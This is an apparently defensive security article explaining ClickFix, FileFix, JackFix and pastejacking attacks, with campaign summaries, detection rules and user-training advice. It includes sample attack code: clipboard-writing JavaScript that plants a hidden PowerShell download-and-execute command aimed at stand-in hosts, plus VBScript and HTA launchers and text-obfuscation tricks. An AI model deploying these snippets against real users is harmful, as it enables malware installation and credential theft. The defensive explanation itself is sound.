The 'Fix' Is the Exploit: ClickFix, FileFix, JackFix and Pastejacking Attacks Explained

TL;DR

ClickFix, FileFix, and JackFix are sophisticated social engineering attacks that trick users into executing malicious code by disguising it as legitimate troubleshooting steps. Attackers display fake error messages, then instruct victims to run PowerShell commands or VBScript files that appear to “fix” the problem but actually install malware. These attacks exploit the clipboard through pastejacking techniques, making the malicious payload nearly invisible. Security teams must prioritize user awareness training and implement technical controls to block PowerShell execution from suspicious sources.

Table of Contents

• What Are ClickFix Attacks?
• The Attack Kill Chain
• FileFix and JackFix Variants
• Pastejacking: The Hidden Weapon
• Real-World Attack Campaigns
• Why These Attacks Work So Well
• Detection and Prevention
• Summary
• Sources
• Important Links

What Are ClickFix Attacks?

ClickFix represents a dangerous evolution in social engineering tactics. Unlike traditional phishing that relies on malicious attachments or links to compromised websites, ClickFix attacks manipulate users into willingly executing malicious code by framing it as a solution to a fabricated problem.

The attack typically begins with a fake error message displayed on a legitimate-looking website or within a phishing email. The error might claim:

• “Your browser needs to verify you’re human”
• “CloudFlare security check required”
• “This document cannot be displayed - click to fix”
• “Download failed - run this command to retry”

The error message then provides step-by-step “troubleshooting” instructions that direct the victim to:

1. Press Windows + R to open the Run dialog
2. Paste a provided command (pre-loaded to clipboard via JavaScript)
3. Press Enter to “fix” the issue

What the victim doesn’t realize is that the “fix” is actually a PowerShell command that downloads and executes malware.

The Psychological Hook

ClickFix exploits several psychological vulnerabilities:

Authority and Trust: Error messages mimic legitimate system warnings or trusted services like CloudFlare, Microsoft, or Google.

Urgency: The messaging creates pressure to act quickly (“Your session will expire”, “Security verification required”).

Helpfulness: The attack provides clear, simple instructions that make victims feel they’re solving a problem rather than causing one.

Technical Camouflage: Most users don’t understand PowerShell commands, so the malicious code looks like gibberish technical instructions.

The Attack Kill Chain

A typical ClickFix attack follows this sequence:

Phase 1: Initial Access

Delivery Methods:

• Phishing emails with links to attacker-controlled sites
• Compromised legitimate websites injected with malicious JavaScript
• Malicious advertisements (malvertising)
• Fake software update notifications
• Compromised WordPress sites or vulnerable web applications

The victim clicks a link or visits a compromised page.

Phase 2: Fake Error Display

JavaScript on the attacker’s page displays a convincing error overlay:

// Example simplified ClickFix JavaScript
document.body.innerHTML = `
  <div class="cloudflare-verify">
    <h2>Verification Required</h2>
    <p>Press Windows + R, then Ctrl + V and click OK</p>
    <p>The command will be automatically copied to your clipboard</p>
  </div>
`;

// Malicious payload copied to clipboard
navigator.clipboard.writeText('powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(\'http://attacker.com/payload.ps1\')"');

Phase 3: Clipboard Manipulation (Pastejacking)

The malicious PowerShell command is automatically copied to the victim’s clipboard using JavaScript’s navigator.clipboard.writeText() function. The victim never sees the actual command—they only see the instructions to paste and run it.

Phase 4: Execution

The victim follows the instructions:

1. Presses Windows + R (opens Run dialog)
2. Presses Ctrl + V (pastes the hidden malicious command)
3. Presses Enter (executes PowerShell)

PowerShell runs in hidden mode (-w hidden flag), so no console window appears. The command downloads and executes the final payload.

Phase 5: Payload Deployment

Common payloads include:

• Information stealers (credential harvesters, browser data theft)
• Remote access trojans (RATs) for persistent access
• Ransomware for financial extortion
• Cryptocurrency miners for resource exploitation
• Credential dumpers targeting Active Directory environments

FileFix and JackFix Variants

ClickFix spawned several variations that use the same core social engineering principle.

FileFix Attacks

FileFix targets users attempting to download files. The attack flow:

1. Victim clicks a download link (document, software, media file)
2. Instead of downloading, a fake error appears: “Download blocked by security settings”
3. Instructions prompt the victim to run a “fix” command that supposedly enables the download
4. The command actually downloads and executes malware

Key Difference: FileFix specifically targets the download workflow, creating a plausible scenario where users expect technical troubleshooting.

JackFix Attacks

JackFix adds clipboard hijacking to the mix. The attack:

1. Monitors the victim’s clipboard for specific patterns (e.g., cryptocurrency wallet addresses)
2. Swaps legitimate clipboard content with attacker-controlled alternatives
3. When combined with ClickFix techniques, provides a “fix” that installs the clipboard hijacker

Real-World Impact: JackFix has been particularly effective in cryptocurrency theft, where users copy-paste wallet addresses for transactions. The malware silently replaces the destination address with the attacker’s wallet.

Technical Execution Variations

VBScript Method: Some variants drop a .vbs file instead of using PowerShell directly:

' Example malicious VBScript
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -File C:\Temp\payload.ps1", 0

MSI Installer Method: Advanced variants package malware as Windows Installer files (.msi) and use msiexec.exe for execution, which appears more legitimate to security tools.

HTML Application (HTA) Method: Some attacks use .hta files that combine HTML and scripting, bypassing browser sandboxes:

<html>
<head>
<script language="VBScript">
  Set objShell = CreateObject("WScript.Shell")
  objShell.Run "powershell IEX(...)hidden code...", 0
  window.close()
</script>
</head>
</html>

Pastejacking: The Hidden Weapon

Pastejacking is the technical foundation that makes ClickFix attacks particularly dangerous. It exploits the clipboard to substitute benign-looking text with malicious code.

How Pastejacking Works

Browser-Based Pastejacking:

Modern browsers allow JavaScript to write to the clipboard using the Clipboard API:

// Attacker writes malicious command to clipboard
navigator.clipboard.writeText('powershell -enc <base64_encoded_malware>');

When the victim pastes (Ctrl + V), they get the attacker’s payload instead of what they copied.

Copy Event Hijacking:

More sophisticated attacks hijack the copy event itself:

document.addEventListener('copy', function(e) {
  e.clipboardData.setData('text/plain', 'malicious_command');
  e.preventDefault();
});

When the user tries to copy legitimate text, the malicious command is copied instead.

Visual Deception Techniques

Attackers use several tricks to hide the malicious nature of commands:

Unicode Tricks: Using right-to-left override characters (U+202E) to visually reverse text:

powershell -c "Write-Host 'Safe‮tfarc_evil//:ptth' gnirts daolnwoD"
# Appears to end with 'Safe' but actually contains reversed malicious URL

Hidden Characters: Embedding zero-width characters or whitespace to break pattern matching:

power​shell -​w hidden -​c "IEX(...)"
# Contains zero-width spaces that are invisible but prevent signature detection

Base64 Encoding: Encoding the entire payload in base64 to obfuscate intent:

powershell -enc SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA...
# Decodes to: IEX((New-Object Net.WebClient).DownloadString('http://evil.com/payload'))

Real-World Attack Campaigns

ClickFix attacks have been observed in numerous campaigns since mid-2024.

Lumma Stealer Campaign (November 2024)

Attack Vector: Fake browser update pages
Payload: Lumma information stealer
Distribution: Compromised WordPress sites and malicious Google ads
Impact: Thousands of infected systems, stolen credentials from browsers, cryptocurrency wallets, and 2FA tokens

TTPs:

• Used GitHub Pages to host fake reCAPTCHA verification pages
• Mimicked CloudFlare’s visual design for credibility
• PowerShell payload downloaded from Discord CDN (content delivery network abuse)
• Final payload: Lumma Stealer v4.0 with enhanced anti-VM capabilities

DarkGate RAT Campaign (September 2024)

Attack Vector: Fake document preview errors
Payload: DarkGate remote access trojan
Distribution: Phishing emails with links to compromised SharePoint sites
Impact: Corporate network compromises, lateral movement, data exfiltration

TTPs:

• Impersonated Microsoft Office 365 error messages
• Victims instructed to “fix” document rendering by running PowerShell
• DarkGate provided full remote control, keylogging, and credential harvesting
• Used legitimate cloud services (OneDrive, Dropbox) for command-and-control

XWorm Trojan Campaign (December 2024)

Attack Vector: Fake software installation errors
Payload: XWorm trojan
Distribution: Malvertising on popular download sites
Impact: Persistent backdoor access, cryptocurrency theft via clipboard hijacking

TTPs:

• Targeted users searching for cracked software or pirated games
• Fake “installation verification” required PowerShell execution
• XWorm variant included JackFix-style clipboard monitoring
• Stole cryptocurrency wallet addresses during copy-paste operations

Why These Attacks Work So Well

ClickFix attacks succeed at scale because they exploit both technical and human vulnerabilities.

Technical Evasion

Bypasses Traditional Security:

• No malicious file attachment: Initial phishing email or compromised website contains only a link
• Legitimate system tools: PowerShell and msiexec.exe are whitelisted on most systems
• No exploit required: Relies entirely on user interaction, bypassing exploit-based detections
• Polymorphic payloads: Base64-encoded or frequently changing commands evade signature detection

Cloud Infrastructure Abuse:

Attackers leverage trusted services for hosting:

• GitHub Pages for hosting fake error pages
• Discord CDN for payload delivery
• Pastebin or GitHub Gists for storing commands
• Legitimate file-sharing services (OneDrive, Google Drive) for C2 communication

Security tools trust these platforms, making detection harder.

Social Engineering Effectiveness

Exploits Trust in Authority:

Users are conditioned to trust error messages from:

• Operating system (Windows Security warnings)
• Web services (CloudFlare, Google reCAPTCHA)
• Software vendors (Microsoft, Adobe update notifications)

ClickFix weaponizes this trust.

Creates Plausible Scenarios:

The “fix” narrative aligns with users’ mental models:

• “Of course I need to verify I’m human”
• “This error must be why the download failed”
• “The website is trying to help me access the content”

Low Technical Barrier:

Users don’t need to understand technology to fall victim. The instructions are simple:

1. Press two keys
2. Paste (Ctrl + V)
3. Press Enter

No technical expertise required.

Detection and Prevention

Defending against ClickFix attacks requires layered controls spanning technology, process, and people.

Technical Controls

PowerShell Execution Restrictions:

Implement Application Control (Windows Defender Application Control or AppLocker):

# Example: Block PowerShell execution for standard users
$RuleName = "Block PowerShell for Standard Users"
$UserSID = "S-1-5-32-545" # Built-in Users group

New-AppLockerPolicy -RuleType Publisher -User $UserSID `
  -FilePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" `
  -Action Deny

Constrained Language Mode:

Configure PowerShell to run in Constrained Language Mode for non-administrators:

$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

This blocks many malicious PowerShell techniques including Invoke-Expression (IEX).

Browser Clipboard Permissions:

Configure browsers to require user permission before JavaScript can access the clipboard:

Chrome/Edge: Settings → Privacy and Security → Site Settings → Additional permissions → Clipboard → Block

Firefox: about:config → dom.events.testing.asyncClipboard → false

Network-Level Detection:

Monitor for suspicious PowerShell activity:

# SIEM detection rule (pseudo-code)
ALERT if:
  process.name == "powershell.exe" AND
  process.command_line contains "-w hidden" AND
  process.command_line contains "DownloadString" AND
  network.connection to (untrusted_domain OR IP_in_threat_intel)

Endpoint Detection and Response (EDR):

Modern EDR solutions can detect:

• PowerShell spawning from browsers or Office applications
• Base64-encoded PowerShell commands
• Execution of scripts from unusual paths (Temp, AppData)
• Network connections to known malicious infrastructure

User Awareness Training

Red Flags to Teach Users:

1. Unexpected error messages asking you to run commands
2. Instructions to use Run dialog (Windows + R) on websites
3. Copy-paste instructions for technical commands you don’t understand
4. Urgency tactics (“Verify now”, “Fix immediately”)
5. Requests to disable security features (“Turn off antivirus to fix”)

Simulated Phishing Campaigns:

Conduct regular phishing simulations that include ClickFix-style attacks. Measure:

• Click-through rate on malicious links
• Execution rate (how many users follow the fake instructions)
• Reporting rate (how many users report the attempt)

Security Champions Program:

Train power users and department leads to:

• Recognize social engineering tactics
• Report suspicious activity to security teams
• Mentor colleagues on security awareness

Incident Response

If a ClickFix attack is suspected:

1. Isolate the system from network immediately
2. Capture forensic evidence (memory dump, process list, network connections)
3. Review PowerShell logs (Event ID 4104 - Script Block Logging)
4. Check for persistence mechanisms (scheduled tasks, registry run keys, startup folders)
5. Perform credential rotation for any accounts accessed on the compromised system
6. Analyze network traffic for C2 communication or data exfiltration

Summary

ClickFix, FileFix, and JackFix attacks represent a sophisticated evolution in social engineering, combining technical clipboard manipulation with psychological manipulation to bypass both security tools and user vigilance.

Key Takeaways:

• The attack is simple but effective: Fake error messages trick users into running malicious PowerShell commands disguised as fixes
• Pastejacking is the technical enabler: JavaScript writes malicious code to the clipboard, making the payload invisible until execution
• Multiple variants exist: FileFix targets downloads, JackFix hijacks clipboard content, all use similar social engineering principles
• Traditional security fails: No malicious file, no exploit, just legitimate system tools executing user-initiated commands
• Defense requires layers: Technical controls (AppLocker, Constrained Language Mode), user training, and EDR monitoring

Defend Against ClickFix:

1. Restrict PowerShell execution for standard users
2. Block clipboard API access in browsers by default
3. Train users to recognize and report social engineering tactics
4. Monitor PowerShell activity with EDR and SIEM rules
5. Simulate ClickFix attacks in phishing awareness campaigns
6. Implement network egress filtering to block known malicious infrastructure

When to Worry:

• Users reporting unusual “fix” instructions on websites
• Spike in PowerShell executions from browsers or Office applications
• Network connections to paste sites, Discord CDN, or GitHub from user endpoints
• Reports of clipboard content changing unexpectedly
• Fake error messages that require running commands

ClickFix attacks will continue evolving as attackers refine their social engineering tactics. Security teams must stay vigilant, prioritize user education, and implement robust technical controls that assume users will make mistakes.

Sources

1. Proofpoint - ClickFix Attacks Surge in Q4 2024

2. Sekoia.io - TA571 Delivering DarkGate via ClickFix Social Engineering

3. Cofense - The Emergence of ClickFix Technique in Phishing Campaigns

4. SANS Internet Storm Center - PowerShell Social Engineering: The ClickFix Trend

5. BleepingComputer - Hackers Abuse ‘ClickFix’ Trick to Deploy Malware via Fake Errors

6. The Hacker News - ClickFix Technique Exploits Social Engineering to Deliver Malware

7. CISA - Cybersecurity Advisory: ClickFix Social Engineering Campaigns

8. Recorded Future - Lumma Stealer Campaign Leverages ClickFix Tactics

9. Microsoft Security Intelligence - Pastejacking Attacks Explained

10. OWASP - Clipboard-Based Attacks and Defenses

11. US-CERT - Social Engineering and Phishing Awareness

12. Cybersecurity & Infrastructure Security Agency - Phishing Guidance

Important Links

1. Microsoft PowerShell Security Best Practices

2. MITRE ATT&CK: User Execution Technique

3. NIST Phishing Awareness Training Guide

4. VirusTotal - Scan Suspicious URLs

5. URLScan.io - Website Security Scanner

6. Hybrid Analysis - Malware Sandbox